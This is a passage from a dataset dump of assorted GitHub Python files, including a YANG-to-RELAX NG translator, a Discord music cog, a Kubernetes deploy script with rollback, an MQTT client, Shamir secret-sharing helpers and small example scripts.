rpcel = SchemaNode(\"nma:rpc\", self.rpcs)\n _, _, r_pset = self.process_patches(pset, stmt, rpcel)\n inpel = SchemaNode(\"nma:input\", rpcel)\n elem = SchemaNode.element(self.qname(stmt), inpel, occur=2)\n _, augs, pset = self.process_patches(r_pset, stmt, elem, \"input\")\n inst = stmt.search_one(\"input\")\n if inst:\n self.handle_substmts(inst, elem, pset)\n else:\n SchemaNode(\"empty\", elem)\n self.apply_augments(augs, elem, pset)\n _, augs, pset = self.process_patches(r_pset, stmt, None, \"output\")\n oust = stmt.search_one(\"output\")\n if oust or augs:\n outel = SchemaNode(\"nma:output\", rpcel)\n outel.occur = 2\n if oust:\n self.handle_substmts(oust, outel, pset)\n self.apply_augments(augs, outel, pset)\n self.handle_substmts(stmt, rpcel, r_pset)\n\n def type_stmt(self, stmt, p_elem, pset):\n \"\"\"Handle ``type`` statement.\n\n Built-in types are handled by one of the specific type\n callback methods defined below.\n \"\"\"\n typedef = stmt.i_typedef\n if typedef and not stmt.i_is_derived: # just ref\n uname, dic = self.unique_def_name(typedef)\n if uname not in dic:\n self.install_def(uname, typedef, dic)\n SchemaNode(\"ref\", p_elem).set_attr(\"name\", uname)\n defst = typedef.search_one(\"default\")\n if defst:\n dic[uname].default = defst.arg\n occur = 1\n else:\n occur = dic[uname].occur\n if occur > 0:\n self.propagate_occur(p_elem, occur)\n return\n chain = [stmt]\n tdefault = None\n while typedef:\n type_ = typedef.search_one(\"type\")\n chain.insert(0, type_)\n if tdefault is None:\n tdef = typedef.search_one(\"default\")\n if tdef:\n tdefault = tdef.arg\n typedef = type_.i_typedef\n if tdefault and p_elem.occur == 0:\n p_elem.default = tdefault\n self.propagate_occur(p_elem, 1)\n self.type_handler[chain[0].arg](chain, p_elem)\n\n def unique_stmt(self, stmt, p_elem, pset):\n def addpref(nid):\n xpath_nodes = []\n child = stmt.parent\n for node in nid.split(\"/\"):\n prefixed_name = self.add_prefix(node, stmt)\n node_name = prefixed_name\n if \":\" in prefixed_name:\n node_name = prefixed_name.split(\":\")[1]\n if child is not None:\n child = statements.search_child(child.substmts,\n child.i_module.i_modulename,\n node_name)\n if child is None or child.keyword not in [\"choice\", \"case\"]:\n xpath_nodes.append(prefixed_name)\n return \"/\".join(xpath_nodes)\n uel = SchemaNode(\"nma:unique\")\n p_elem.annot(uel)\n uel.attr[\"tag\"] = \" \".join(\n [addpref(nid) for nid in stmt.arg.split()])\n\n def uses_stmt(self, stmt, p_elem, pset):\n expand = False\n grp = stmt.i_grouping\n for sub in stmt.substmts:\n if sub.keyword in (\"refine\", \"augment\"):\n expand = True\n self.add_patch(pset, sub)\n if expand:\n self.lookup_expand(grp, list(pset))\n elif len(self.prefix_stack) <= 1 and not hasattr(stmt,\"d_expand\"):\n uname, dic = self.unique_def_name(\n stmt.i_grouping, not p_elem.interleave)\n if uname not in dic:\n self.install_def(uname, stmt.i_grouping, dic,\n p_elem.interleave)\n elem = SchemaNode(\"ref\", p_elem).set_attr(\"name\", uname)\n occur = dic[uname].occur\n if occur > 0:\n self.propagate_occur(p_elem, occur)\n self.handle_substmts(stmt, elem)\n return\n self.handle_substmts(grp, p_elem, pset)\n\n def when_stmt(self, stmt, p_elem, pset=None):\n p_elem.attr[\"nma:when\"] = self.yang_to_xpath(stmt.arg)\n\n def yang_version_stmt(self, stmt, p_elem, pset):\n if float(stmt.arg) > self.YANG_version:\n raise error.EmitError(\"Unsupported YANG version: %s\" % stmt.arg)\n\n # Handlers for YANG types\n\n def binary_type(self, tchain, p_elem):\n def gen_data():\n return SchemaNode(\"data\").set_attr(\"type\", \"base64Binary\")\n self.type_with_ranges(tchain, p_elem, \"length\", gen_data)\n\n def bits_type(self, tchain, p_elem):\n elem = SchemaNode(\"list\", p_elem)\n zom = SchemaNode(\"zeroOrMore\", elem)\n choi = SchemaNode.choice(zom, occur=2)\n for bit in tchain[0].search(\"bit\"):\n SchemaNode(\"value\", choi, bit.arg)\n\n def boolean_type(self, tchain, p_elem):\n elem = SchemaNode.choice(p_elem, occur=2)\n SchemaNode(\"value\", elem, \"true\")\n SchemaNode(\"value\", elem, \"false\")\n\n def choice_type(self, tchain, p_elem):\n \"\"\"Handle ``enumeration`` and ``union`` types.\"\"\"\n elem = SchemaNode.choice(p_elem, occur=2)\n self.handle_substmts(tchain[0], elem)\n\n def empty_type(self, tchain, p_elem):\n SchemaNode(\"empty\", p_elem)\n\n def identityref_type(self, tchain, p_elem):\n bid = tchain[0].search_one(\"base\").i_identity\n if bid not in self.identity_deps:\n sys.stderr.write(\"%s: warning: identityref has empty value space\\n\"\n % tchain[0].pos)\n p_elem.subnode(SchemaNode(\"notAllowed\"))\n p_elem.occur = 0\n return\n der = self.identity_deps[bid]\n if len(der) > 1:\n p_elem = SchemaNode.choice(p_elem, occur=2)\n for i in der:\n p_elem.subnode(self.add_derived_identity(i))\n\n def instance_identifier_type(self, tchain, p_elem):\n SchemaNode(\"parentRef\", p_elem).attr[\"name\"] = \"__instance-identifier__\"\n ii = SchemaNode(\"nma:instance-identifier\")\n p_elem.annot(ii)\n rinst = tchain[0].search_one(\"require-instance\")\n if rinst:\n ii.attr[\"require-instance\"] = rinst.arg\n\n def leafref_type(self, tchain, p_elem):\n typ = tchain[0]\n occur = p_elem.occur\n pathstr = typ.parent.i_leafref.i_expanded_path\n p_elem.attr[\"nma:leafref\"] = self.yang_to_xpath(pathstr)\n while isinstance(typ.i_type_spec, types.PathTypeSpec):\n typ = typ.i_type_spec.i_target_node.search_one(\"type\")\n self.handle_stmt(typ, p_elem)\n if occur == 0:\n p_elem.occur = 0\n\n def mapped_type(self, tchain, p_elem):\n \"\"\"Handle types that are simply mapped to RELAX NG.\"\"\"\n SchemaNode(\"data\", p_elem).set_attr(\"type\",\n self.datatype_map[tchain[0].arg])\n\n def numeric_type(self, tchain, p_elem):\n \"\"\"Handle numeric types.\"\"\"\n typ = tchain[0].arg\n def gen_data():\n elem = SchemaNode(\"data\").set_attr(\"type\", self.datatype_map[typ])\n if typ == \"decimal64\":\n fd = tchain[0].search_one(\"fraction-digits\").arg\n SchemaNode(\"param\",elem,\"19\").set_attr(\"name\",\"totalDigits\")\n SchemaNode(\"param\",elem,fd).set_attr(\"name\",\"fractionDigits\")\n return elem\n self.type_with_ranges(tchain, p_elem, \"range\", gen_data)\n\n def string_type(self, tchain, p_elem):\n pels = []\n for t in tchain:\n for pst in t.search(\"pattern\"):\n pels.append(SchemaNode(\"param\",\n text=pst.arg).set_attr(\"name\",\"pattern\"))\n def get_data():\n elem = SchemaNode(\"data\").set_attr(\"type\", \"string\")\n for p in pels:\n elem.subnode(p)\n return elem\n self.type_with_ranges(tchain, p_elem, \"length\", get_data)\n","repo_name":"mbj4668/pyang","sub_path":"pyang/translators/dsdl.py","file_name":"dsdl.py","file_ext":"py","file_size_in_byte":50317,"program_lang":"python","lang":"en","doc_type":"code","stars":504,"dataset":"github-code","pt":"95"} +{"seq_id":"19796011212","text":"import asyncio\n\nimport discord\nfrom core import i18n\nfrom core.cog import SubCog\nfrom core.commands import commandExtra\nfrom discord.ext import commands\nfrom utils.paginator import EmbedPages\n\n\nclass MusicInfo(SubCog, category=\"Player Information\"):\n def __init__(self, bot):\n self.bot = bot\n\n # @music_check(no_channel=True, bot_no_channel=True, same_channel=True, not_playing=True)\n @commandExtra(name='nowplaying', aliases=['np', 'current', 'currentsong'], category=\"Player Information\")\n async def now_playing(self, ctx):\n if not ctx.player.current or not ctx.player.is_playing:\n return await ctx.send(embed=discord.Embed(colour=ctx.embed_color,\n title=_(\"{0} | No song is currently playing!\").format(ctx.emoji.queue)), delete_after=15)\n controller_msg = await ctx.send(embed=ctx.player.main_page)\n\n for reaction in self.controls:\n await controller_msg.add_reaction(str(reaction))\n\n def check(r, u):\n return u.id == ctx.author.id and r.message.id == controller_msg.id\n\n while controller_msg:\n\n try:\n react, user = await self.bot.wait_for('reaction_add', check=check, timeout=60)\n control = self.controls.get(getattr(ctx.emoji, react.emoji.name))\n except asyncio.TimeoutError:\n try:\n await controller_msg.delete()\n except:\n return\n return\n\n try:\n await controller_msg.remove_reaction(react, user)\n except discord.Forbidden:\n pass\n\n if control == 'Main_Page':\n await controller_msg.edit(embed=ctx.player.main_page)\n if control == 'Song_Info_Page':\n await controller_msg.edit(embed=discord.Embed(color=ctx.embed_color,\n description=_(\"Loading song information...\") + \" <a:discord_loading:587812494089912340>\"))\n await controller_msg.edit(embed=await ctx.player.song_info_page())\n if control == 'Info_Page':\n await controller_msg.edit(embed=ctx.player.info_page)\n if control == 'Delete_Page':\n await controller_msg.delete()\n if control == 'Download_Song':\n if ctx.player.current.length > 300000:\n await controller_msg.edit(embed=discord.Embed(color=ctx.embed_color, description=_(\"Sorry, I can't download songs longer than 5 minutes...\")))\n\n else:\n check, msg = await ctx.confirm(_(\"This will download an mp3 of this song, are you sure you wish to continue?\"), edit=False)\n\n if check:\n await msg.delete()\n await controller_msg.edit(embed=discord.Embed(color=ctx.embed_color, description=_(\"Downloading your mp3 file...\") + \" <a:discord_loading:587812494089912340>\\n\" + _(\"Please be patient, this may take a while... Bigger songs take longer to download! :)\")))\n await controller_msg.edit(embed=await ctx.player.download_song())\n if not check:\n await msg.delete()\n await controller_msg.edit(embed=discord.Embed(color=ctx.embed_color, description=_(\"Cancelled mp3 download.\")))\n if control == 'Lyric_Page':\n await controller_msg.edit(embed=discord.Embed(color=ctx.embed_color, description=_(\"Searching for lyrics...\") + \" <a:discord_loading:587812494089912340>\"))\n try:\n await controller_msg.edit(embed=await ctx.player.lyrics_page())\n except AttributeError:\n await controller_msg.edit(embed=discord.Embed(color=ctx.embed_color, description=_(\"I was unable to find lyrics for this song.\")))\n\n # @music_check(no_channel=True, bot_no_channel=True, same_channel=True, not_playing=True)\n @commandExtra(name='queue', aliases=['q', 'que'], category=\"Player Information\")\n @commands.cooldown(1, 10, commands.BucketType.user)\n async def _queue(self, ctx):\n upcoming = list(ctx.player.entries)\n if not upcoming:\n return await ctx.send(embed=discord.Embed(colour=ctx.embed_color,\n title=_(\"{0} | No more songs in queue!\").format(ctx.emoji.queue)), delete_after=15)\n\n queue_list = []\n for track in upcoming:\n queue_list.append(f'[**{track.title}**]({track.uri})')\n\n # description=_(\"{0} tracks\").format(len(upcoming)) + f'\\n\\n{queue_list}')\n # embed.set_footer(text=_(\"Viewing page {0}/{1}\").format(page, pages))\n\n paginator = EmbedPages(ctx,\n title=_(\"{0} | Player Queue\").format(ctx.emoji.queue),\n entries=queue_list,\n per_page=10,\n show_entry_count=True)\n\n await paginator.start()\n\n\ndef setup(bot):\n pass\n","repo_name":"iDutchy/Charles","sub_path":"cogs/music/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":5034,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"72450385272","text":"from typing import Optional\n\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n def __str__(self):\n if self.next:\n return str(self.val) + '>' + str(self.next)\n else:\n return str(self.val)\n\n def __repr__(self):\n return str(self)\n\n\nclass Solution:\n def reverseLinked(self, head: Optional[ListNode]) -> Optional[ListNode]:\n res: Optional[ListNode] = None\n while head:\n p1, head = head, head.next\n p1.next = res\n res = p1\n return res\n\n def isPalindrome(self, head: Optional[ListNode]) -> bool:\n slow, fast = head, head\n while fast.next and fast.next.next:\n fast = fast.next.next\n slow = slow.next\n\n pivot = self.reverseLinked(slow.next)\n while pivot:\n if head.val != pivot.val:\n return False\n head = head.next\n pivot = pivot.next\n return True","repo_name":"MaddHatt-PM/cs-and-software-engineering-resources","sub_path":"problems--leetcode/0234-palindrome-linked-list/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"31396552771","text":"#!/usr/bin/env python3\n\nimport os\nimport subprocess\nimport sys\nimport tempfile\nimport time\nimport json\nfrom datetime import datetime\n\nfrom jinja2 import Template\n\n\nclass HealthError(Exception):\n \"\"\" This gets thrown if there is something wrong with the health of a service.\"\"\"\n\n\ndef get_options():\n options = {}\n on_flag = \"\"\n for arg in sys.argv:\n if on_flag:\n options[on_flag] = arg\n on_flag = \"\"\n continue\n if arg.startswith('--'):\n on_flag = arg.lstrip('-')\n continue\n if arg == '-f':\n on_flag = '-filename-'\n\n return options\n\n\ndef get_yaml(options):\n filename = options.pop('-filename-', 'k8s-deployment.yaml')\n with open(filename, 'r') as f:\n s = f.read()\n template = Template(s)\n final = template.render(**options)\n return final\n\n\ndef check_health_of_first_pod(deployment):\n results = subprocess.check_output(['kubectl', 'get', 'deployment', deployment, '-o', 'json'])\n deployment_json = json.loads(results.decode())\n\n status = deployment_json.get('status', {})\n\n if (status.get('updatedReplicas') == status.get('availableReplicas')\n and status.get('unavailableReplicas') is None):\n return\n\n labels = [f'{k}={v}' for k, v in\n deployment_json.get('spec', {}).get('selector', {}).get('matchLabels', {}).items()]\n\n count = 0\n for i in range(24): # 24 times is 2 minutes (5 second sleep below)\n command = ['kubectl', 'get', 'pods', '-o', 'json']\n for label in labels:\n command.append(f'-l{label}')\n pod_command = subprocess.check_output(command)\n pods = json.loads(pod_command.decode())\n\n pods = sorted(pods.get('items'),\n key=lambda p: p.get('metadata', {}).get('creationTimestamp'))\n new_pod = pods[-1] # the newest one is the one we care about\n\n pod_details_command = subprocess.check_output(['kubectl', 'get', 'pod', '-o', 'json',\n new_pod.get('metadata').get('name')])\n new_pod = json.loads(pod_details_command.decode())\n\n if new_pod.get('status').get('phase') == 'Running':\n for cond in new_pod.get('status').get('conditions'):\n if cond.get('type') == 'Ready':\n if cond.get('status') == 'True':\n # All is good, continue deployment\n return\n for c in new_pod.get('status').get('containerStatuses'):\n if c.get('state').get('waiting'):\n if c.get('state').get('waiting').get('reason') in ('ImagePullBackOff', 'ErrImagePull'):\n print(\n 'Having trouble pulling the image (ImagePullBackOff)')\n if count > 1:\n print('Rolling Back deploy')\n raise HealthError('Cant get container. Image must be bad.')\n elif c['state']['waiting']['reason'] == 'CrashLoopBackOff':\n print('-- Logs of bad container --')\n pod_logs = subprocess.check_output(\n ['kubectl', 'logs', new_pod['metadata']['name']])\n print(pod_logs.decode())\n raise HealthError('Container not starting up correctly. Rolling back.')\n\n print('Waiting for 1st container to become healthy...')\n time.sleep(5)\n count += 1\n try:\n pod_logs = subprocess.check_output(\n ['kubectl', 'logs', new_pod['metadata']['name']])\n try:\n pod_logs = pod_logs.encode()\n except AttributeError:\n # not bytes\n pass\n print(pod_logs)\n except subprocess.CalledProcessError:\n print('-no pod logs-')\n raise HealthError('Container never went healthy, rolling back.')\n\n\ndef continue_deployment(deployment):\n subprocess.run(['kubectl', 'rollout', 'resume', f'deployment/{deployment}'])\n\n\ndef rollback_deployment(deployment):\n print('-- Rolling back deployment --')\n\n continue_deployment(deployment)\n time.sleep(1)\n subprocess.run(['kubectl', 'rollout', 'undo', f'deployment/{deployment}'])\n\n print(f'-- Rolled Back Deployment @ {datetime.utcnow()} -- ')\n\n\ndef wait_till_complete(deployment):\n subprocess.run(['kubectl', 'rollout', 'status', f'deployment/{deployment}'])\n\n\ndef deploy(filename):\n out = subprocess.check_output(['kubectl', 'apply', '-f', filename])\n print(out.decode())\n deployment = ''\n for line in out.decode().split('\\n'):\n if line.startswith('deployment.apps/'):\n deployment = line[16:].split(' ')[0]\n if deployment:\n time.sleep(2)\n subprocess.run(['kubectl', 'rollout', 'pause', f'deployment/{deployment}'])\n try:\n check_health_of_first_pod(deployment)\n except HealthError as e:\n rollback_deployment(deployment)\n raise SystemExit(str(e))\n else:\n continue_deployment(deployment)\n wait_till_complete(deployment)\n\n\ndef run():\n if os.getenv('KUBECTL_CONFIG'):\n os.makedirs('/root/.kube', exist_ok=True)\n with open('/root/.kube/config', 'w') as f:\n f.write(os.getenv('KUBECTL_CONFIG'))\n\n if os.getenv('CI_ENVIRONMENT_NAME'):\n context = os.getenv('CI_ENVIRONMENT_NAME')\n subprocess.check_output(['kubectl', 'config', 'use-context', context])\n \n options = get_options()\n s = get_yaml(options)\n\n with tempfile.NamedTemporaryFile('w') as f:\n f.write(s)\n f.flush()\n\n deploy(f.name)\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"nhumrich/k8s-deploy","sub_path":"scripts/k8s-deploy.py","file_name":"k8s-deploy.py","file_ext":"py","file_size_in_byte":5659,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"95"} +{"seq_id":"2939206865","text":"# Fibonacci numbers module\n\ntest_variable = 100\n\n# write Fibonacci series up to n\ndef fib(n):\n a, b = 0, 1\n while b < n:\n print(b, end=' ')\n a, b = b, a+b\n print()\n","repo_name":"eur-nl/bootcamps","sub_path":"zzzzz_archive/intro/fibo.py","file_name":"fibo.py","file_ext":"py","file_size_in_byte":187,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"41125209386","text":"# client 모듈을 이용한 라즈베리 파이 mqtt 구독 프로그램\n# 수신 메시지를 분석하여 서로 다른 처리를 한다\n\nimport paho.mqtt.client as mqtt\n\n# 서버와 연결되었을 때 실행되는 콜백 함수\ndef on_connect(client, userdata, flags, rc):\n print(\"Connectd with result code \"+str(rc))\n\n # 구독 신청\n # 연결 될 때 마다 새로 구독 신청\n client.subscribe(\"Core/topic1\")\n client.subscribe(\"Core/topic2\")\n\n# 메시지를 수신했을 때 실행되는 콜백 함수\ndef on_message(client, userdata, msg):\n print(msg.topic+\" \"+str(msg.payload))\n\n if msg.payload.decode() == \"Hello\":\n print(\"Receiving message: #1, do something\")\n\n if msg.payload.decode() == \"World!\":\n print(\"Receiving message #2, do something else\")\n\n# MQTT 클라이언트 객체를 생성하고 콜백 함수 연결\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.connect(\"test.mosquitto.org\", 1883, 60) #브로커 연결\n\nclient.loop_forever()","repo_name":"yeolkyu/Python_Network_Programming","sub_path":"13장/mqtt_client_demo.py","file_name":"mqtt_client_demo.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"1839298139","text":"from setuptools import setup, find_packages\n# To use a consistent encoding\nfrom codecs import open\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\n# Arguments marked as \"Required\" below must be included for upload to PyPI.\n# Fields marked as \"Optional\" may be commented out.\n\nsetup(\n # This is the name of your project. The first time you publish this\n # package, this name will be registered for you. It will determine how\n # users can install this project, e.g.:\n #\n # $ pip install sampleproject\n #\n # And where it will live on PyPI: https://pypi.org/project/sampleproject/\n #\n # There are some restrictions on what makes a valid project name\n # specification here:\n # https://packaging.python.org/specifications/core-metadata/#name\n name='agile', # Required\n\n # Versions should comply with PEP 440:\n # https://www.python.org/dev/peps/pep-0440/\n #\n # For a discussion on single-sourcing the version across setup.py and the\n # project code, see\n # https://packaging.python.org/en/latest/single_source_version.html\n version='0.0.1', # Required\n\n # This is a one-line description or tagline of what your project does. This\n # corresponds to the \"Summary\" metadata field:\n # https://packaging.python.org/specifications/core-metadata/#summary\n description='COst Minimization Bed INvErsion model for ice caps and valley glaciers', # Required\n\n # This is an optional longer description of your project that represents\n # the body of text which users will see when they visit PyPI.\n #\n # Often, this is the same as your README, so you can just read it in from\n # that file directly (as we have already done above)\n #\n # This field corresponds to the \"Description\" metadata field:\n # https://packaging.python.org/specifications/core-metadata/#description-optional\n long_description=long_description, # Optional\n\n # Denotes that our long_description is in Markdown; valid values are\n # text/plain, text/x-rst, and text/markdown\n #\n # Optional if long_description is written in reStructuredText (rst) but\n # required for plain-text or Markdown; if unspecified, \"applications should\n # attempt to render [the long_description] as text/x-rst; charset=UTF-8 and\n # fall back to text/plain if it is not valid rst\" (see link below)\n #\n # This field corresponds to the \"Description-Content-Type\" metadata field:\n # https://packaging.python.org/specifications/core-metadata/#description-content-type-optional\n long_description_content_type='text/markdown', # Optional (see note above)\n\n # This should be a valid link to your project's main homepage.\n #\n # This field corresponds to the \"Home-Page\" metadata field:\n # https://packaging.python.org/specifications/core-metadata/#home-page-optional\n url='https://github.com/OGGM/agile', # Optional\n\n # This should be your name or the name of the organization which owns the\n # project.\n author='Patrick Schmitt', # Optional\n\n # This should be a valid email address corresponding to the author listed\n # above.\n author_email='patrick.schmitt@uibk.ac.at', # Optional\n\n # Classifiers help users find your project by categorizing it.\n #\n # For a list of valid classifiers, see https://pypi.org/classifiers/\n classifiers=[ # Optional\n # How mature is this project? Common values are\n # 3 - Alpha\n # 4 - Beta\n # 5 - Production/Stable\n 'Development Status :: 3 - Alpha',\n\n # Indicate who your project is intended for\n 'Intended Audience :: Science/Research',\n\n # Pick your license as you wish\n 'License :: OSI Approved :: BSD License',\n\n # Specify the Python versions you support here. In particular, ensure\n # that you indicate whether you support Python 2, Python 3 or both.\n 'Programming Language :: Python :: 3',\n ],\n\n # This field adds keywords for your project which will appear on the\n # project page. What does your project relate to?\n #\n # Note that this is a string of words separated by whitespace, not a list.\n keywords=['geosciences', 'glaciers', 'inversion'], # Optional\n\n # You can just specify package directories manually here if your project is\n # simple. Or you can use find_packages().\n #\n # Alternatively, if you just want to distribute a single Python file, use\n # the `py_modules` argument instead as follows, which will expect a file\n # called `my_module.py` to exist:\n #\n # py_modules=[\"my_module\"],\n #\n packages=find_packages(exclude=['tests']), # Required\n\n # This field lists other packages that your project depends on to run.\n # Any package you put here will be installed by pip when your project is\n # installed, so they must be valid existing projects.\n #\n # For an analysis of \"install_requires\" vs pip's requirements files see:\n # https://packaging.python.org/en/latest/requirements.html\n # install_requires=['numpy'], # Optional\n\n # List additional groups of dependencies here (e.g. development\n # dependencies). Users will be able to install these using the \"extras\"\n # syntax, for example:\n #\n # $ pip install sampleproject[dev]\n #\n # Similar to `install_requires` above, these must be valid existing\n # projects.\n extras_require={},\n\n # If there are data files included in your packages that need to be\n # installed, specify them here.\n package_data={ # Optional\n },\n\n # Although 'package_data' is the preferred approach, in some case you may\n # need to place data files outside of your packages. See:\n # http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files\n #\n # In this case, 'data_file' will be installed into '<sys.prefix>/my_data'\n data_files={}, # Optional\n\n # To provide executable scripts, use entry points in preference to the\n # \"scripts\" keyword. Entry points provide cross-platform support and allow\n # `pip` to create the appropriate form of executable for the target\n # platform.\n #\n # For example, the following would provide a command called `sample` which\n # executes the function `main` from this package when invoked:\n entry_points={\n 'console_scripts': [\n 'run_idealized_experiment = agile1d.sandbox.run_idealized_experiment:main',\n 'pytest.agile1d = agile1d.tests.__main__:main'\n ],\n },\n\n # List additional URLs that are relevant to your project as a dict.\n #\n # This field corresponds to the \"Project-URL\" metadata fields:\n # https://packaging.python.org/specifications/core-metadata/#project-url-multiple-use\n #\n # Examples listed include a pattern for specifying where the package tracks\n # issues, where the source is hosted, where to say thanks to the package\n # maintainers, and where to support the project financially. The key is\n # what's used to render the link text on PyPI.\n project_urls={ # Optional\n 'Bug Reports': 'https://github.com/OGGM/agile/issues',\n 'Source': 'https://github.com/OGGM/agile',\n },\n)\n","repo_name":"OGGM/AGILE","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":7313,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"95"} +{"seq_id":"21686989755","text":"from typing import Optional\n\nfrom sqlmodel import Field, Session, SQLModel, create_engine\n\n\nclass Hero(SQLModel, table=True):\n id: Optional[int] = Field(default=None, primary_key=True)\n name: str\n secret_name: str\n age: Optional[int] = None\n\n\nhero_1 = Hero(name=\"Mubarek\", secret_name=\"Kamil\")\n\nengine = create_engine(\"sqlite:///database.db\")\nSQLModel.metadata.create_all(engine)\n\nwith Session(engine) as session:\n session.add(hero_1)\n session.commit()\n","repo_name":"lerime/sqlmodel-hello","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"41578972167","text":"from socket import *\nimport time\nimport numpy as np\n\ndef compute_period(timestamps):\n\tdeltas = []\n\tfor i,_ in enumerate(timestamps[:-1]):\n\t\tdeltas.append(timestamps[i+1] - timestamps[i])\n\treturn np.mean(deltas)\n\ns = socket(AF_INET, SOCK_DGRAM)\n\ns.bind(('',9090))\n\nt0 = time.time()\nstamps = []\nwhile True:\n\tdata, addr = s.recvfrom(100)\n\ttd = time.time() - t0\n\tt0 = time.time()\n\tstamps.append(t0)\n\tprint(1/compute_period(stamps[-min(len(stamps), 200):]), 1/td)\n\n","repo_name":"x3medima17/telepresence","sub_path":"web-client/udp_robot.py","file_name":"udp_robot.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"1882426913","text":"import random\nimport string\nimport os\n\nfrom secretsharing import PlaintextToHexSecretSharer\nfrom secretsharing import secret_int_to_points, points_to_secret_int\nfrom base64 import b64decode\nfrom crypto.keys import Keys\nfrom crypto.public import Public\nfrom crypto.private import Private\n\ndef split_secret(data, threshold, num_points):\n splits = []\n split_ints = secret_int_to_points(int.from_bytes(data, byteorder=\"big\"), threshold, num_points)\n for item in split_ints:\n bytes = item[1].to_bytes(32, byteorder=\"big\")\n splits.append(bytes)\n return splits\n\ndef split_random_secret(era_hash, threshold, num_points):\n random = os.urandom(32)\n data = random+era_hash\n return split_secret(data, threshold, num_points)\n\ndef recover_splits(splits):\n return points_to_secret_int(splits)\n\ndef enc_part_secret(publickey, split):\n enc_data = Public.encrypt(split, publickey)\n return enc_data\n\ndef dec_part_secret(privatekey, enc_data, number):\n split = Private.decrypt(enc_data, privatekey)\n if split:\n return (number + 1, int.from_bytes(split, byteorder=\"big\"))\n\n return None\n\ndef decode_random(encoded_splits, private_keys):\n splits = []\n count = min(len(encoded_splits), len(private_keys))\n for i in range(count):\n split = encoded_splits[i]\n private_key = private_keys[i]\n split = dec_part_secret(private_key, split, i)\n if split:\n splits.append(split)\n assert splits, \"No split parts decoded for shared random\"\n return recover_splits(splits)\n\ndef encode_splits(splits, public_keys):\n encoded_splits = []\n for i in range(0, len(splits)):\n public_key = public_keys[i]\n if public_key:\n encoded_split = enc_part_secret(public_key, splits[i])\n encoded_splits.append(encoded_split)\n \n return encoded_splits\n","repo_name":"pandoraboxchain/prometheus-python","sub_path":"crypto/secret.py","file_name":"secret.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"95"} +{"seq_id":"43040731611","text":"from ...core.core_tools import check_json\nfrom spikeinterface.widgets.base import BackendPlotter\n\nclass SortingviewPlotter(BackendPlotter):\n backend = 'sortingview'\n backend_kwargs_desc = {\n \"generate_url\": \"If True, the figurl URL is generated and printed. Default is True\",\n \"figlabel\": \"The figurl figure label. Default None\"\n }\n default_backend_kwargs = {\n \"generate_url\": True,\n \"figlabel\": None\n }\n \n def make_serializable(*args):\n serializable_dict = check_json({i: a for i, a in enumerate(args[1:])})\n returns = ()\n for i in range(len(args) - 1):\n returns += (serializable_dict[i],)\n if len(returns) == 1:\n returns = returns[0]\n return returns\n\n def set_view(self, view):\n self.view = view\n\n\ndef generate_unit_table_view(unit_ids):\n import sortingview.views as vv\n ut_rows = [\n vv.UnitsTableRow(unit_id=u, values={})\n for u in unit_ids\n ]\n ut_columns = []\n v_units_table = vv.UnitsTable(rows=ut_rows, columns=ut_columns)\n return v_units_table\n","repo_name":"LorenFrankLab/spikeinterface","sub_path":"spikeinterface/widgets/sortingview/base_sortingview.py","file_name":"base_sortingview.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"95"} +{"seq_id":"73063212153","text":"import subprocess\nimport sys\n\n\ndef run_with_stdout(cmd):\n \"\"\"Execute command with output from the process sent to stdout\n :param: cmd: Command to execute\n :return: Return code of the process\n \"\"\"\n process = subprocess.run(\n cmd,\n stdout=sys.stdout,\n stderr=subprocess.STDOUT,\n shell=True\n )\n return process.returncode\n","repo_name":"itiviti-cpp-2021/local-environment","sub_path":"internal/util/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"22194907358","text":"import functools\n\nlst=[\"shubham\",\"abcdefg\",\"joshi\"]\n\ndef check(a,b):\n if len(a)>len(b):\n return 1\n elif len(a)==len(b):\n return ord(a[0])-ord(b[0])\n else:\n return -1\n \n \nprint(sorted(lst,key=functools.cmp_to_key(check)))\n","repo_name":"joshishubham769/crossword","sub_path":"tst.py","file_name":"tst.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"32437991701","text":"from scrapy import Spider, Request\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.crawler import CrawlerProcess\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy_playwright.page import PageCoroutine\nfrom crawler.crawler.items import Product\nfrom scrapy.loader import ItemLoader\nfrom itemloaders.processors import TakeFirst, MapCompose, Join, Identity\nfrom w3lib.html import remove_tags\n\n\nclass ProductLoader(ItemLoader):\n default_input_processor = MapCompose(remove_tags)\n default_output_processor = Join()\n\n company_in = Identity()\n company_out = Identity()\n\n url_in = Identity()\n url_out = Identity()\n\n photo_out = TakeFirst()\n\n\nclass TestSpider(Spider):\n 